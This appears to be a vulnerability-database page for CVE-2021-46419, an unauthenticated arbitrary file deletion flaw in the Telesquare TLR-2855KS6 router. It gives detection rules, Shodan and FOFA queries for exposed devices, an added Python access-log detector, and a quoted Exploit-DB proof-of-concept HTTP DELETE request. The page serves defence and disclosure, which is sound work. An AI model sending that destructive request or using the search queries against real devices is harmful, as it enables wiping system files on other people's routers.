CVE-2021-46419
Published: 2022-04-07
Priority: P2 · 74 · Critical 9.1 (CVSS 3.1)
CVSS vector: AV:N / AC:L / PR:N / UI:N / S:U / C:N / I:H / A:H
Exploit: public PoC available (Exploit-DB and Nuclei entries below)
EPSS: 71.38% (99.3rd percentile)
An unauthorized file deletion vulnerability in the Telesquare TLR-2855KS6 router: an unauthenticated HTTP DELETE request to a path under /cgi-bin/ deletes the target file, which can include system files and scripts.
Detection & IOCs (extracted from sources)
- Detect exploit attempts by monitoring for unauthenticated HTTP DELETE requests targeting the /cgi-bin/ path on Telesquare TLR-2855KS6 devices (lighttpd web server).
- Identify exposed TLR-2855KS6 devices via Shodan with the query title:"Login to TLR-2855KS6" or http.title:"login to tlr-2855ks6".
- Identify exposed TLR-2855KS6 devices via FOFA with product=="TELESQUARE-TLR-2855KS6" or title="login to tlr-2855ks6".
- The exploit sequence used in public tooling is a two-step HTTP interaction: a PUT request to /cgi-bin/<filename>.txt returning HTTP 201 (the server accepts unauthenticated file creation), followed by a DELETE request to the same path returning HTTP 204. Alert on this PUT-then-DELETE pattern from the same client. A lone DELETE against an existing path, as in the Exploit-DB PoC below, is the destructive form and should alert on its own.
- The PoC sends a DNT: 1 header in both the PUT and DELETE requests. DNT is a standard browser privacy header, so it is at most a weak corroborating signal: use it to raise confidence alongside a PUT or DELETE to /cgi-bin/, never as a standalone rule.
- The vulnerability requires no authentication (PR:N, UI:N per CVSS): any unauthenticated HTTP DELETE request to a /cgi-bin/ path is sufficient to delete the file. No session or credentials are needed.
- The nonce cookie in the PoC (nonce=16426923592222) is specific to the researcher's test session and is not required for exploitation; the vulnerability is unauthenticated.
- The affected device runs lighttpd as its web server; fingerprinting via the Server response header can confirm the target identity before an alert is raised.
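The following Python script is an added example, not code from the page's sources or from the Exploit-DB or Nuclei authors. It applies the two log-based rules above to lighttpd access-log lines: it flags every PUT or DELETE under /cgi-bin/ (on this device those need no credentials) and the PUT 201 followed by DELETE 204 probe sequence on the same path from the same client. It assumes lighttpd's default accesslog.format or plain Common Log Format; the sample lines are constructed (192.0.2.10 and 198.51.100.7 are documentation addresses), and the rule names and the 60-second correlation window are choices made here, not values from any source.

```python
import re
from datetime import datetime, timedelta

# Matches lighttpd's default accesslog.format
#   "%h %V %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\""
# and plain Common Log Format ("%h %l %u %t \"%r\" %>s %b"): both put three
# whitespace-separated fields before the bracketed timestamp.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) '
)

MUTATING = {"PUT", "DELETE"}
CGI_PREFIX = "/cgi-bin/"


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # ignore any query string
    return rec


def analyze(lines, window=timedelta(seconds=60)):
    """Return (alerts, skipped). Each alert is (rule, client, path, time).

    "cgi_bin_mutation":    any PUT or DELETE under /cgi-bin/; on this device
                           these methods are unauthenticated, so each one alerts.
    "put_delete_sequence": PUT -> 201 then DELETE -> 204 on the same path from
                           the same client within `window` (the probe pattern).
    """
    alerts, skipped = [], 0
    last_put = {}  # (client, path) -> time of the most recent PUT that got 201
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            skipped += 1
            continue
        client, path, method = rec["client"], rec["path"], rec["method"]
        if method in MUTATING and path.startswith(CGI_PREFIX):
            alerts.append(("cgi_bin_mutation", client, path, rec["time"]))
        if method == "PUT" and rec["status"] == 201:
            last_put[(client, path)] = rec["time"]
        elif method == "DELETE" and rec["status"] == 204:
            t = last_put.pop((client, path), None)
            if t is not None and rec["time"] - t <= window:
                alerts.append(("put_delete_sequence", client, path, rec["time"]))
    return alerts, skipped


# Constructed sample log lines (not real device output). The third request
# mirrors the public PoC, which sends DELETE /cgi-bin/test.cgi.
SAMPLE_LOG = """\
192.0.2.10 router.example - [07/Apr/2022:10:00:00 +0000] "PUT /cgi-bin/abcd.txt HTTP/1.1" 201 0 "-" "Mozilla/5.0"
192.0.2.10 router.example - [07/Apr/2022:10:00:01 +0000] "DELETE /cgi-bin/abcd.txt HTTP/1.1" 204 0 "-" "Mozilla/5.0"
192.0.2.10 router.example - [07/Apr/2022:10:00:05 +0000] "DELETE /cgi-bin/test.cgi HTTP/1.1" 204 0 "http://192.168.1.5/" "Mozilla/5.0"
198.51.100.7 router.example - [07/Apr/2022:10:01:00 +0000] "GET /cgi-bin/login.cgi HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
this line is not an access-log record
"""


def run_sample():
    """Run the detector over the constructed sample; returns (alerts, skipped)."""
    return analyze(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    found, bad = run_sample()
    for rule, client, path, when in found:
        print(f"{when:%Y-%m-%dT%H:%M:%S} {rule:20} {client:14} {path}")
    print(f"{bad} unparseable line(s) skipped")
```

On the sample the script raises three cgi_bin_mutation alerts (the PUT, the probe DELETE, and the PoC-style DELETE of test.cgi) plus one put_delete_sequence alert for the abcd.txt pair; the GET is ignored. Access logs do not record the Server response header, so the lighttpd fingerprint mentioned above has to come from the asset inventory or a scan, not from this parser.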
CVSS provenance
NVD · v3.1 · 9.1 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
NVD · v2.0 · 6.4 MEDIUM · AV:N/AC:L/Au:N/C:N/I:P/A:P
No detection rules found.
Exploit-DB
Telesquare TLR-2855KS6 - Arbitrary File Deletion (exploitdb · 2022-04-11 · CVSS 9.1 · CRITICAL)
---
# Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Deletion
# Date: 7/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: http://www.telesquare.co.kr/
# Version: TLR-2855KS6
# Tested on: Linux [Firefox]
# CVE : CVE-2021-46419
# Proof of Concept
DELETE /cgi-bin/test.cgi HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 438
Origin: http://192.168.1.5
DNT: 1
Connection: close
Referer: http://192.168.1.5/
Cookie: nonce=16426923592222
Nuclei
Telesquare TLR-2855KS6 - Arbitrary File Deletion (nuclei · CVSS 9.1 · CRITICAL)
Template:
id: CVE-2021-46419

info:
  name: Telesquare TLR-2855KS6 - Arbitrary File Deletion
  author: DhiyaneshDK
  severity: critical
  description: |
    An unauthorized file deletion vulnerability in Telesquare TLR-2855KS6 via DELETE method can allow deletion of system files and scripts.
  impact: |
    Unauthenticated attackers can delete arbitrary files from the Telesquare TLR-2855KS6 device using HTTP DELETE requests, potentially destroying system files and rendering the device inoperable.
  remediation: |
    Apply firmware updates provided by Telesquare or restrict HTTP DELETE access to the device.
  reference:
    - https://
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/166675/Telesquare-TLR-2855KS6-Arbitrary-File-Deletion.html
- https://drive.google.com/drive/folders/1TWw3Oy0wZImSHK_hj-tKkbn9sFgqqySp